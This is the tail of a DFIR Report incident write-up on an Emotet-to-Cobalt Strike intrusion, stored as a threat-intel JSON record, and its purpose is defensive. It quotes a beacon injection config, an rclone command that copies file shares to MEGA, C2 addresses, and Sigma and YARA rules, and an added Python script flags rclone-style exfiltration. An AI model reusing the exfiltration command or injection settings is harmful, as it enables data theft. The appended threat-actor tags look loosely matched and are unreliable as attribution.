\"process-inject\": {\r\n \"allocator\": \"NtMapViewOfSection\",\r\n \"execute\": [\r\n \"CreateThread 'ntdll!RtlUserThreadStart'\",\r\n \"CreateThread\",\r\n \"NtQueueApcThread-s\",\r\n \"CreateRemoteThread\",\r\n \"RtlCreateUserThread\"\r\n ],\r\n \"min_alloc\": 17500,\r\n \"startrwx\": false,\r\n \"stub\": \"yl5rgAigihmtjA5iEHURzg==\",\r\n \"transform-x86\": [\r\n \"prepend '\\\\x90\\\\x90'\"\r\n ],\r\n \"transform-x64\": [\r\n \"prepend '\\\\x90\\\\x90'\"\r\n ],\r\n \"userwx\": false\r\n },\r\n \"dns-beacon\": {\r\n \"dns_idle\": null,\r\n \"dns_sleep\": null,\r\n \"maxdns\": null,\r\n \"beacon\": null,\r\n \"get_A\": null,\r\n \"get_AAAA\": null,\r\n \"get_TXT\": null,\r\n \"put_metadata\": null,\r\n \"put_output\": null\r\n },\r\n \"pipename\": null,\r\n \"smb_frame_header\": \"AAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\n \"stage\": {\r\n \"cleanup\": true\r\n },\r\n \"ssh\": {\r\n \"hostname\": null,\r\n \"port\": null,\r\n \"username\": null,\r\n \"password\": null,\r\n \"privatekey\": null\r\n }\r\n}\r\nThe process-inject block explains the injected svchost.exe and explorer.exe hits from the memory scan: the beacon maps its code into the target with NtMapViewOfSection and then tries the listed execution primitives in order until one works.\r\nAtera and Splashtop\r\nThreat actors used the Atera and Splashtop remote access tools on two compromised hosts during the intrusion. Atera gave the threat actors interactive access. We cannot, however, confirm that the threat actors made use of this access, because the majority of activity originated from the Cobalt Strike beacons.\r\nExfiltration\r\nThe threat actors used Rclone to exfiltrate sensitive data to MEGA.io cloud storage. 
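Because rclone is a legitimate tool that attackers rename at will, the more durable detection is the argument fingerprint in the command line rather than the image name. The following is an added example, not code from the DFIR Report: it scores constructed process-creation command lines (the rclone invocation logged in this case, in the comma-separated form the page shows, plus an invented renamed copy and a benign robocopy run for contrast) and extracts the source share and the destination remote. The weights, the threshold and the backend list are the editor's assumptions for illustration.

```python
"""Score process command lines for rclone-style exfiltration; the image name is not trusted.

Added example, not part of the original DFIR Report write-up. SAMPLE_CMDLINES is
constructed: the first is the rclone invocation logged in this case (comma-separated,
as on the page); the renamed-binary and robocopy lines are invented for contrast.
Weights, threshold and the backend list are assumptions for illustration.
"""
import re
import shlex

# Flags specific to rclone's CLI, matched as prefixes so "--flag=value" also hits.
# "--multi-thread-stream" is a prefix of rclone's --multi-thread-streams and of the
# form logged on the page. Weights are assumptions.
RCLONE_FLAGS = {
    "--auto-confirm": 3,
    "--ignore-existing": 2,
    "--multi-thread-stream": 2,
    "--transfers": 1,
    "--config": 1,
    "--no-check-certificate": 1,
    "-q": 1,
}
RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto", "lsd", "lsf", "config"}
KNOWN_BACKENDS = {"mega", "s3", "b2", "drive", "dropbox", "onedrive", "box", "sftp", "ftp"}  # assumption

UNC_RE = re.compile(r"^\\\\[^\\]+\\")                 # \\server\share...
DRIVE_RE = re.compile(r"^[A-Za-z]:[\\/]")              # C:\path is a local path, not a remote
REMOTE_RE = re.compile(r"^([A-Za-z0-9_-]+):(\S*)$")    # rclone "remote:path"
SUSPICIOUS_AT = 6                                      # assumption

SAMPLE_CMDLINES = [
    r"rclone.exe, copy, \\REDACTED\Shares, mega:Shares, -q, --ignore-existing, --auto-confirm, --multi-thread-stream",
    r"C:\ProgramData\svchost.exe sync \\fs01\IT gdrive:backup --transfers 16 --auto-confirm --ignore-existing",
    r"robocopy.exe D:\Data \\fs01\Backup /MIR /R:1 /W:1",
]


def split_args(cmdline):
    """Accept both a normal command line and the comma-separated form some EDRs log."""
    if ", " in cmdline and " " not in cmdline.replace(", ", ""):
        return [a.strip() for a in cmdline.split(",")]
    return [a.strip('"') for a in shlex.split(cmdline, posix=False)]


def analyze(cmdline):
    """Return a score, the reasons behind it, and the source/destination if found."""
    args = split_args(cmdline)
    if not args:
        return None
    image, rest = args[0], args[1:]
    score, reasons = 0, []
    if image.lower().rsplit("\\", 1)[-1] == "rclone.exe":
        score += 2
        reasons.append("image name rclone.exe")
    if rest and rest[0].lower() in RCLONE_VERBS:
        score += 1
        reasons.append(f"rclone verb {rest[0]}")
    for flag, weight in RCLONE_FLAGS.items():
        if any(a.lower().startswith(flag) for a in rest):
            score += weight
            reasons.append(f"flag {flag}")
    source = next((a for a in rest if UNC_RE.match(a)), None)
    if source:
        score += 1
        reasons.append(f"UNC source {source}")
    destination = None
    for a in rest:
        m = REMOTE_RE.match(a)
        # A remote:path token counts when the backend is known, or when the rest of
        # the line already looks like rclone (so an unknown remote name still scores).
        if m and not DRIVE_RE.match(a) and (m.group(1).lower() in KNOWN_BACKENDS or score >= 4):
            destination = a
            score += 3
            reasons.append(f"cloud remote {a}")
            break
    return {"image": image, "score": score, "reasons": reasons, "source": source,
            "destination": destination, "suspicious": score >= SUSPICIOUS_AT}


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        r = analyze(line)
        print(f"{'ALERT' if r['suspicious'] else 'ok   '} score={r['score']:2d} {r['image']}  {r['reasons']}")
```

The renamed copy still scores well above the threshold on --auto-confirm, --ignore-existing and the remote:path argument alone, which is the point: the Sigma rule further down catches rclone.exe crossing an SMB share, while this catches the invocation whatever the binary is called.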
Command line logging revealed the destination to be the MEGA service and the network shares targeted (arguments are shown comma-separated, as logged):\r\nrclone.exe, copy, \\\\REDACTED\\Shares, mega:Shares, -q, --ignore-existing, --auto-confirm, --multi-thread-stream\r\nThis activity was also visible on the network via Zeek logs showing the SMB share connection activity.\r\nActions on Objectives\r\nEmotet has for some time been used as an initial access broker for various intrusions; however, some Emotet infections are tasked with continuing the delivery of new campaigns. In this intrusion, we observed both happening at the same time: access was handed to a threat actor who used Cobalt Strike and exfiltrated data from the network, all the while the original Emotet infection was tasked with sending new malicious emails.\r\nThe Emotet mailer started roughly once each day during the intrusion, marked by bursts of connections to various email servers.\r\nThe emails were sent through various compromised email accounts, distributing additional malicious xls files to further propagate Emotet.\r\nWe did not see any further activity, but we believe that, given enough time, this would have ended in domain-wide ransomware. 
We have a case coming up in a few weeks where it does exactly that.\r\nIndicators\r\nFile:\r\ninfo_1805.xls\r\nMD5: acd3d4e8f63f52eaf57467a76ca2389d\r\nSHA1: 4a42b5e7e7fd43ddefc856f45bb95d97656ddca6\r\nSHA256: e598b9700e13f2cb1c30c6d9230152ed5716a6d6e25db702576fefeb6638005e\r\n1.dll\r\nMD5: 27d0b9e38cdc9a31fa9271c0bbf5d393\r\nSHA1: e96980812c287c9d27be9181bcf08727cc9f457a\r\nSHA256: 1b9c9e4ed6dab822b36e3716b1e8f046e92546554dff9bdbd18c822e18ab226b\r\nfind.bat\r\nMD5: c96b2b5b52ef0013b841d136ddab0f49\r\nSHA1: 22cc2bc032ae327de9f975e9122b692e4474ac15\r\nSHA256: 5a5c601ede80d53e87e9ccb16b3b46f704e63ec7807e51f37929f65266158f4c\r\np.bat\r\nMD5: adf2b487134ffcd7999e419318dfdf8d\r\nSHA1: 91c54877440d14538be22d662e7f47e29ab219bf\r\nSHA256: fd72a9313f8564b57ebd18791a438216d289d4a97df3f860f1fc585a001265d9\r\nllJyMIOvft.dll\r\nMD5: e984f812689ec7af136a151a19b2d56c\r\nSHA1: 88591ad3806c0a1e451c744d4942e99e9a5d2ff7\r\nSHA256: 2b2e00ed89ce6898b9e58168488e72869f8e09f98fecb052143e15e98e5da9df\r\nUOmCgbXygCe.exe\r\nMD5: 592155bbbab05ac1f818cfd9eb53b672\r\nSHA1: 82070d19c26e0f7e255168e1f2364174215aa0de\r\nSHA256: f4c085ef1ba7e78a17a9185e4d5e06163fe0e39b6b0dc3088b4c1ed11c0d726b\r\nNetwork:\r\nCobalt Strike:\r\n59.95.98.204:8080\r\nhttp://59.95.98.204:8080/jquery-3.3.1.min.js\r\nEmotet:\r\n103.8.26.17:8080\r\n134.122.119.23:8080\r\n54.38.143.246:7080\r\n202.29.239.162:443\r\nDetections\r\nNetwork\r\nSuricata rules:\r\nET DROP Spamhaus DROP Listed Traffic Inbound group 13\r\nET CNC Feodo Tracker Reported CnC Server group 9\r\nET CNC Feodo Tracker Reported CnC Server group 12\r\nET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M2\r\nET MALWARE Cobalt Strike Beacon Activity (GET)\r\nET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response\r\nET MALWARE Cobalt Strike Activity (POST)\r\nET CNC Feodo Tracker Reported CnC Server group 22\r\nET POLICY SMB Executable File Transfer\r\nET RPC DCERPC SVCCTL - Remote Service Control Manager Access\r\nET CNC Feodo Tracker Reported CnC Server group 
24\r\nET MALWARE W32/Emotet CnC Beacon 3\r\nSigma\r\nhttps://github.com/The-DFIR-Report/Sigma-Rules/blob/main/ateraagent_malicious_installations.yml\r\ntitle: AteraAgent malicious installations\r\nid: fb0f2d48-269d-473e-9afc-c540a16a990f\r\ndescription: Detects potentially malicious AteraAgent installations when the IntegratorLogin parameter is used\r\nstatus: experimental\r\ndate: 2022/09/12\r\nauthor: '@kostastsale, @TheDFIRReport'\r\nlogsource:\r\n    category: process_creation\r\n    product: windows\r\ndetection:\r\n    selection1:\r\n        Image:\r\n            - '*\\AteraAgent.exe'\r\n        CommandLine|contains|all:\r\n            - '/i '\r\n            - 'IntegratorLogin='\r\n    selection2:\r\n        CommandLine|contains:\r\n            # Feel free to modify the email addresses to fit your needs\r\n            - '@gmail.com'\r\n            - '@hotmail.com'\r\n            - '@yandex.ru'\r\n            - '@mail.ru'\r\n            - '@outlook.com'\r\n            - '@protonmail.com'\r\n            - '@dropmail.me'\r\n    condition: selection1 and selection2\r\nfalsepositives:\r\n    - Unlikely\r\nlevel: high\r\ntags:\r\n    - attack.command_and_control\r\n    - attack.t1219\r\nhttps://github.com/The-DFIR-Report/Sigma-Rules/blob/main/rclone_smb_share_exfiltration.yml\r\ntitle: Rclone SMB Share Exfiltration\r\nid: 889bc648-5164-44f4-9388-fb5d6b58a7b2\r\nstatus: experimental\r\ndescription: Detects rclone.exe being transferred over SMB to or from a Windows network share, as seen when the tool is staged for exfiltration.\r\nauthor: '@TheDFIRReport'\r\ndate: 2022/09/12\r\nreferences:\r\n    - https://thedfirreport.com/\r\nlogsource:\r\n    product: zeek\r\n    service: smb_files\r\ndetection:\r\n    selection:\r\n        file_name|endswith:\r\n            - '\\rclone.exe'\r\n    condition: selection\r\nfalsepositives:\r\n    - Approved business backup processes.\r\nlevel: medium\r\ntags:\r\n    - attack.exfiltration\r\n    - attack.t1567.002\r\nhttps://github.com/The-DFIR-Report/Sigma-Rules/blob/main/potential_smb_dll_lateral_movement.yml\r\ntitle: Potential SMB DLL Lateral Movement\r\nid: 
8fe1524e-8c97-404c-9dee-090929a315c4\r\nstatus: experimental\r\ndescription: Detection of potential use of SMB to transfer DLLs into the ProgramData folder of hosts for purpo\r\nauthor: '@TheDFIRReport'\r\ndate: 2022/09/12\r\nreferences:\r\n    - https://thedfirreport.com/\r\nlogsource:\r\n    product: zeek\r\n    service: smb_files\r\ndetection:\r\n    selection_1:\r\n        file_name|contains:\r\n            - 'programdata'\r\n    selection_2:\r\n        file_name|endswith:\r\n            - '.dll'\r\n    condition: selection_1 and selection_2\r\nfalsepositives:\r\n    - RMM Tools and Administrative activities in ProgramData Folder.\r\nlevel: medium\r\ntags:\r\n    - attack.lateral_movement\r\n    - attack.t1570\r\nhttps://github.com/SigmaHQ/sigma/blob/8b749fb1260b92b9170e4e69fa1bd2f34e94d766/rules/windows/builtin/security/win_security_smb_file_cr\r\nYara\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/case_14335.yar\r\n/*\r\nYARA Rule Set\r\nAuthor: The DFIR Report\r\nDate: 2022-09-12\r\nIdentifier: Emotet Case 14335\r\nReference: https://thedfirreport.com/\r\n*/\r\n/* Rule Set ----------------------------------------------------------------- */\r\nimport \"pe\"\r\nrule llJyMIOvft_14335 {\r\n meta:\r\n description = \"llJyMIOvft.dll\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2022-09-12\"\r\n hash1 = \"2b2e00ed89ce6898b9e58168488e72869f8e09f98fecb052143e15e98e5da9df\"\r\n strings:\r\n $s1 = \"Project1.dll\" fullword ascii\r\n $s2 = \"!\u003ev:\\\"6;\" fullword ascii\r\n $s3 = \"y6./XoFz_6fw%r:6*\" fullword ascii\r\n $s4 = \"u3!RuF%OR_O*^$nw7\u0026\u003cassembly xmlns=\\\"urn:schemas-microsoft-com:asm.v1\\\" manifestVersion=\\\"1.0\\\"\u003e\"\r\n $s5 = \"*/B+ n\" fullword ascii\r\n $s6 = \"ZnwFY66\" fullword ascii\r\n $s7 = \"1!f%G%w\" fullword ascii\r\n $s8 = \"QKMaXCL6\" fullword ascii\r\n $s9 = \"IMaRlh9\" fullword ascii\r\n $s10 = \"_BZRDe'7\u00267\u003c\u003c!{nBLU\" 
fullword ascii\r\n $s11 = \"lw7\\\"668!qZNL_EIS7IiMa\" fullword ascii\r\n $s12 = \"IS6\\\\JMtdHh0Piw2/PuH\" fullword ascii\r\n $s13 = \"iw#!RuF%OR__*^$nw76668!qZNL_EYS7I\" fullword ascii\r\n $s14 = \".RuF%LR__*^$\" fullword ascii\r\n $s15 = \"^\u003c_EHJ3IPLPeZX0Phg7!BAK%_\" fullword ascii\r\n $s16 = \"ilG8Rn\\\"2OIkY*E%zw'v669(pZGn_EH_6IE\" fullword ascii\r\n $s17 = \"ilg7Rnr0OI^]*JTnw6\\\"76\u003c\" fullword ascii\r\n $s18 = \"Broken pipe\" fullword ascii /* Goodware String - occured 742 times */\r\n $s19 = \"Permission denied\" fullword ascii /* Goodware String - occured 823 times */\r\n $s20 = \"v)(Ro\\\"\u003eOHkU*D%xw9\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 3000KB and\r\n ( pe.imphash() == \"066c972d2129d0e167d371a0abfcf03b\" and ( pe.exports(\"YAeJyEAYL7F4eDck6YUaf\") and pe.ex\r\n}\r\nrule UOmCgbXygCe_14335 {\r\n meta:\r\n description = \"UOmCgbXygCe.exe\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2022-09-12\"\r\n hash1 = \"f4c085ef1ba7e78a17a9185e4d5e06163fe0e39b6b0dc3088b4c1ed11c0d726b\"\r\n strings:\r\n $s1 = \"runsuite.log\" fullword ascii\r\n $s2 = \"AppPolicyGetProcessTerminationMethod\" fullword ascii\r\n $s3 = \"f73.exe\" fullword ascii\r\n $s4 = \"Processing test line %ld %s leaked %d\" fullword ascii\r\n $s5 = \"Internal error: xmlSchemaTypeFixup, complex type '%s': the \u003csimpleContent\u003e\u003crestriction\u003e is missin\r\n $s6 = \"The target namespace of the included/redefined schema '%s' has to be absent or the same as the in\r\n $s7 = \"The target namespace of the included/redefined schema '%s' has to be absent, since the including/\r\n $s8 = \"A \u003csimpleType\u003e is expected among the children of \u003crestriction\u003e, if \u003csimpleContent\u003e is used and th\r\n $s9 = \"there is at least one entity reference in the node-tree currently being validated. 
Processing of\r\n $s10 = \"## %s test suite for Schemas version %s\" fullword ascii\r\n $s11 = \"Internal error: %s, \" fullword ascii\r\n $s12 = \"If \u003csimpleContent\u003e and \u003crestriction\u003e is used, the base type must be a simple type or a complex t\r\n $s13 = \"For a string to be a valid default, the type definition must be a simple type or a complex type\r\n $s14 = \"For a string to be a valid default, the type definition must be a simple type or a complex type\r\n $s15 = \"Could not open the log file, running in verbose mode\" fullword ascii\r\n $s16 = \"not validating will not read content for PE entity %s\" fullword ascii\r\n $s17 = \"Skipping import of schema located at '%s' for the namespace '%s', since this namespace was alrea\r\n $s18 = \"(annotation?, (simpleContent | complexContent | ((group | all | choice | sequence)?, ((attribute\r\n $s19 = \"get namespace\" fullword ascii\r\n $s20 = \"instance %s fails to parse\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 7000KB and\r\n ( pe.imphash() == \"bcf185f1308ffd9e4249849d206d9d0c\" and pe.exports(\"xmlEscapeFormatString\") or 12 of th\r\n}\r\nrule info_1805_14335 {\r\n meta:\r\n description = \"info_1805.xls\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2022-09-12\"\r\n hash1 = \"e598b9700e13f2cb1c30c6d9230152ed5716a6d6e25db702576fefeb6638005e\"\r\n strings:\r\n $s1 = \"32.exe\" fullword ascii\r\n $s2 = \"System32\\\\X\" fullword ascii\r\n $s3 = \"DocumentOwnerPassword\" fullword wide\r\n $s4 = \"DocumentUserPassword\" fullword wide\r\n $s5 = \"t\\\"\u0026\\\"t\\\"\u0026\\\"p\\\"\u0026\\\"s:\\\"\u0026\\\"//lo\\\"\u0026\\\"pe\\\"\u0026\\\"sp\\\"\u0026\\\"ub\\\"\u0026\\\"li\\\"\u0026\\\"ci\\\"\u0026\\\"da\\\"\u0026\\\"de.c\\\"\u0026\\\"o\\\"\u0026\\\"m/cgi-\r\n $s6 = \"UniresDLL\" fullword ascii\r\n $s7 = \"OEOGAJPGJPAG\" fullword ascii\r\n $s8 = \"\\\\Windows\\\\\" fullword ascii\r\n $s9 = \"_-* #,##0.00_-;\\\\-* 
#,##0.00_-;_-* \\\"-\\\"??_-;_-@_-\" fullword ascii\r\n $s10 = \"_-* #,##0_-;\\\\-* #,##0_-;_-* \\\"-\\\"_-;_-@_-\" fullword ascii\r\n $s11 = \"_-;_-* \\\"\" fullword ascii\r\n $s12 = \"^{)P -z)\" fullword ascii\r\n $s13 = \"ResOption1\" fullword ascii\r\n $s14 = \"DocumentSummaryInformation\" fullword wide /* Goodware String - occured 41 times */\r\n $s15 = \"Root Entry\" fullword wide /* Goodware String - occured 46 times */\r\n $s16 = \"SummaryInformation\" fullword wide /* Goodware String - occured 50 times */\r\n $s17 = \"A\\\",\\\"JJCCBB\\\"\" fullword ascii\r\n $s18 = \"Excel 4.0\" fullword ascii\r\n $s19 = \"Microsoft Print to PDF\" fullword wide\r\n $s20 = \"\\\"_-;\\\\-* #,##0.00\\\\ \\\"\" fullword wide /* Goodware String - occured 1 times */\r\n condition:\r\n uint16(0) == 0xcfd0 and filesize \u003c 200KB and\r\n all of them\r\n}\r\nrule cobalt_strike_14435_dll_1 {\r\n meta:\r\n description = \"1.dll\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2022-09-12\"\r\n hash1 = \"1b9c9e4ed6dab822b36e3716b1e8f046e92546554dff9bdbd18c822e18ab226b\"\r\n strings:\r\n $s1 = \"curity\u003e\u003crequestedPrivileges\u003e\u003crequestedExecutionLevel level=\\\"asInvoker\\\" uiAccess=\\\"false\\\"\u003e\u003c/req\r\n $s2 = \"CDNS Project.dll\" fullword ascii\r\n $s3 = \"hemas.microsoft.com/SMI/2005/WindowsSettings\\\"\u003etrue\u003c/dpiAware\u003e\u003c/windowsSettings\u003e\u003c/application\u003e\u003c/a\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 20 of 23\n\n$s4 = \"Hostname to lookup:\" fullword wide\r\n $s5 = \"Hostnames:\" fullword wide\r\n $s6 = \"wOshV- D3\\\"RIcP@DN \\\\\" fullword ascii\r\n $s7 = \"T4jk{zrvG#@KRO* d'z\" fullword ascii\r\n $s8 = \"CDNS Project Version 1.0\" fullword wide\r\n $s9 = \"zK$%S.cPO\u003ertW\" fullword ascii\r\n $s10 = \"vOsh.HSDiXRI\" fullword ascii\r\n $s11 = \"l4p.oZewOsh7zP\" fullword ascii\r\n $s12 = \"5p2o.ewOsh7H\" fullword ascii\r\n $s13 = 
\"h7H.DiX\" fullword ascii\r\n $s14 = \"l4pWo.ewOsh[H%DiXRI\" fullword ascii\r\n $s15 = \"rEWS).lpp~o\" fullword ascii\r\n $s16 = \",m}_lOG\" fullword ascii\r\n $s17 = \"\u003cassembly xmlns=\\\"urn:schemas-microsoft-com:asm.v1\\\" manifestVersion=\\\"1.0\\\"\u003e\u003ctrustInfo xmlns=\\\"\r\n $s18 = \"vileges\u003e\u003c/security\u003e\u003c/trustInfo\u003e\u003capplication xmlns=\\\"urn:schemas-microsoft-com:asm.v3\\\"\u003e\u003cwindowsS\r\n $s19 = \"tn9- 2\" fullword ascii\r\n $s20 = \"PDiXRI7\" fullword ascii\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 8000KB and\r\n ( pe.imphash() == \"d1aef4e37a548a43a95d44bd2f8c0afc\" or 8 of them )\r\n}\r\nrule cobalt_strike_14435_dll_2 {\r\n meta:\r\n description = \"32.dll\"\r\n author = \"The DFIR Report\"\r\n reference = \"https://thedfirreport.com/\"\r\n date = \"2022-09-12\"\r\n hash1 = \"76bfb4a73dc0d3f382d3877a83ce62b50828f713744659bb21c30569d368caf8\"\r\n strings:\r\n $x1 = \"mail glide drooping dismiss collation production mm refresh murderer start parade subscription ac\r\n $s2 = \"vlu405yd87.dll\" fullword ascii\r\n $s3 = \"XYVZSWWVU\" fullword ascii /* base64 encoded string 'aVRYeT' */\r\n $s4 = \"ZYWVWSXVT\" fullword ascii /* base64 encoded string 'aeVIuS' */\r\n $s5 = \"WXVZTVVUVX\" fullword ascii /* base64 encoded string 'YuYMUTU' */\r\n $s6 = \"ZYXZXSWZW\" fullword ascii /* base64 encoded string 'avWIfV' */\r\n $s7 = \"SZWVSZTVU\" fullword ascii /* base64 encoded string 'eeRe5T' */\r\n $s8 = \"VXVWUWVZYY\" fullword ascii /* base64 encoded string 'UuVQeYa' */\r\n $s9 = \"VSXZZYSVU\" fullword ascii /* base64 encoded string 'IvYa%T' */\r\n $s10 = \"VXUZUVWVU\" fullword ascii /* base64 encoded string ']FTUeT' */\r\n $s11 = \"SVVZZXZUVW\" fullword ascii /* base64 encoded string 'IUYevTU' */\r\n $s12 = \"USVZVSWVZ\" fullword ascii /* base64 encoded string 'IVUIeY' */\r\n $s13 = \"SWVVTVSVWWXZZVVV\" fullword ascii /* base64 encoded string 'YUSU%VYvYUU' */\r\n $s14 = \"VSXVUXXZS\" fullword ascii /* 
base64 encoded string 'IuT]vR' */\r\n $s15 = \"WSVZYWZWWW\" fullword ascii /* base64 encoded string 'Y%YafVY' */\r\n $s16 = \"XUSZXXVVW\" fullword ascii /* base64 encoded string 'Q\u0026W]UV' */\r\n $s17 = \"ZWZWZVZWWWZ\" fullword ascii /* base64 encoded string 'efVeVVYf' */\r\n $s18 = \"STZVYVVZYS\" fullword ascii /* base64 encoded string 'I6UaUYa' */\r\n $s19 = \"ZWZWYSZXUZ\" fullword ascii /* base64 encoded string 'efVa\u0026WQ' */\r\n $s20 = \"SVVWWVVVWW\" fullword ascii /* base64 encoded string 'IUVYUUY' */\r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 2000KB and\r\n ( pe.imphash() == \"4e03b8b675969416fb0d10e8ab11f7c2\" or ( 1 of ($x*) or 12 of them ) )\r\n}\r\nrule find_bat_14335 {\r\nmeta:\r\ndescription = \"Find.bat using AdFind\"\r\nauthor = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com/\"\r\ndate = \"2022-09-12\"\r\nhash1 = \"5bc00ad792d4ddac7d8568f98a717caff9d5ef389ed355a15b892cc10ab2887b\"\r\nstrings:\r\n$x1 = \"find.exe\" nocase wide ascii\r\n$s1 = \"objectcategory\" nocase wide ascii\r\n$s2 = \"person\" nocase wide ascii\r\n$s3 = \"computer\" nocase wide ascii\r\n$s4 = \"organizationalUnit\" nocase wide ascii\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 21 of 23\n\n$s5 = \"trustdmp\" nocase wide ascii\r\ncondition:\r\nfilesize \u003c 1000\r\nand 1 of ($x*)\r\nand 4 of ($s*)\r\n}\r\nrule adfind_14335 {\r\n meta:\r\n description = \"Find.bat using AdFind\"\r\n author = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com/\"\r\ndate = \"2022-09-12\"\r\n hash1 = \"b1102ed4bca6dae6f2f498ade2f73f76af527fa803f0e0b46e100d4cf5150682\"\r\n strings:\r\n $x1 = \"joeware.net\" nocase wide ascii\r\n$s1 = \"xx.cpp\" nocase wide ascii\r\n$s2 = \"xxtype.cpp\" nocase wide ascii\r\n$s3 = \"Joe Richards\" nocase wide ascii\r\n$s4 = \"RFC 2253\" nocase wide ascii\r\n$s5 = \"RFC 2254\" nocase wide ascii\r\n \r\n condition:\r\n uint16(0) == 0x5a4d and filesize \u003c 2000KB\r\n and 1 of ($x*)\r\n or 
4 of ($s*)\r\n}\r\nrule p_bat_14335 {\r\n meta:\r\n description = \"Finding bat files that is used for enumeration\"\r\n author = \"The DFIR Report\"\r\nreference = \"https://thedfirreport.com/\"\r\ndate = \"2022-09-12\"\r\n strings:\r\n \r\n$a1 = \"for /f %%i in\" nocase wide ascii\r\n$a2 = \"do ping %%i\" nocase wide ascii\r\n$a3 = \"-n 1 \u003e\u003e\" nocase wide ascii\r\n$a4 = \"res.txt\" nocase wide ascii\r\n \r\n condition:\r\n filesize \u003c 2000KB\r\n and all of ($a*)\r\n}\r\nMITRE\r\nDynamic-link Library Injection - T1055.001\r\nComponent Object Model - T1559.001\r\nPowerShell - T1059.001\r\nRegsvr32 - T1218.010\r\nPass the Hash - T1550.002\r\nDomain Groups - T1069.002\r\nDomain Account - T1087.002\r\nDomain Trust Discovery - T1482\r\nMalicious File - T1204.002\r\nSMB/Windows Admin Shares - T1021.002\r\nLateral Tool Transfer - T1570\r\nProcess Injection - T1055\r\nExfiltration to Cloud Storage - T1567.002\r\nThread Execution Hijacking - T1055.003\r\nRemote System Discovery - T1018\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 22 of 23\n\nSystem Information Discovery - T1082\r\nApplication Layer Protocol - T1071\r\nNetwork Share Discovery - T1135\r\nKerberoasting - T1558.003\r\nLSASS Memory - T1003.001\r\nRegistry Run Keys / Startup Folder - T1547.001\r\nPhishing - T1566\r\nSpearphishing Attachment - T1566.001\r\nInternal case #14335\r\nSource: https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nhttps://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/\r\nPage 23 of 23",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/"
	],
	"report_names": [
		"dead-or-alive-an-emotet-story"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3fad11c6-4336-4b28-a606-f510eca5452e",
			"created_at": "2022-10-25T16:07:24.346573Z",
			"updated_at": "2026-04-10T02:00:04.948823Z",
			"deleted_at": null,
			"main_name": "Turbine Panda",
			"aliases": [
				"APT 26",
				"Black Vine",
				"Bronze Express",
				"Group 13",
				"JerseyMikes",
				"KungFu Kittens",
				"PinkPanther",
				"Shell Crew",
				"Taffeta Typhoon",
				"Turbine Panda",
				"WebMasters"
			],
			"source_name": "ETDA:Turbine Panda",
			"tools": [
				"Agent.dhwf",
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Derusbi",
				"Destroy RAT",
				"DestroyRAT",
				"FF-RAT",
				"FormerFirstRAT",
				"Hurix",
				"Kaba",
				"Korplug",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mivast",
				"PlugX",
				"RbDoor",
				"RedDelta",
				"RibDoor",
				"Sakula",
				"Sakula RAT",
				"Sakurel",
				"Sogu",
				"StreamEx",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Winnti",
				"Xamtrav",
				"cobeacon",
				"ffrat"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c5f79f58-db78-4cd7-88cf-c029a2199360",
			"created_at": "2022-10-25T16:07:23.325227Z",
			"updated_at": "2026-04-10T02:00:04.542909Z",
			"deleted_at": null,
			"main_name": "APT 12",
			"aliases": [
				"APT 12",
				"BeeBus",
				"Bronze Globe",
				"CTG-8223",
				"Calc Team",
				"Crimson Iron",
				"DNSCalc",
				"DynCALC",
				"G0005",
				"Group 22",
				"Hexagon Typhoon",
				"Numbered Panda"
			],
			"source_name": "ETDA:APT 12",
			"tools": [
				"AUMLIB",
				"ETUMBOT",
				"Exploz",
				"Graftor",
				"HIGHTIDE",
				"IHEATE",
				"IXESHE",
				"RIPTIDE",
				"RapidStealer",
				"Specfix",
				"THREEBYTE",
				"bbsinfo",
				"mswab",
				"yayih"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d18fe42c-8407-4f96-aee0-a04e6dce219a",
			"created_at": "2023-01-06T13:46:38.275292Z",
			"updated_at": "2026-04-10T02:00:02.907303Z",
			"deleted_at": null,
			"main_name": "APT12",
			"aliases": [
				"Group 22",
				"Calc Team",
				"DNSCalc",
				"IXESHE",
				"Hexagon Typhoon",
				"BeeBus",
				"DynCalc",
				"Crimson Iron",
				"BRONZE GLOBE",
				"NUMBERED PANDA",
				"TG-2754"
			],
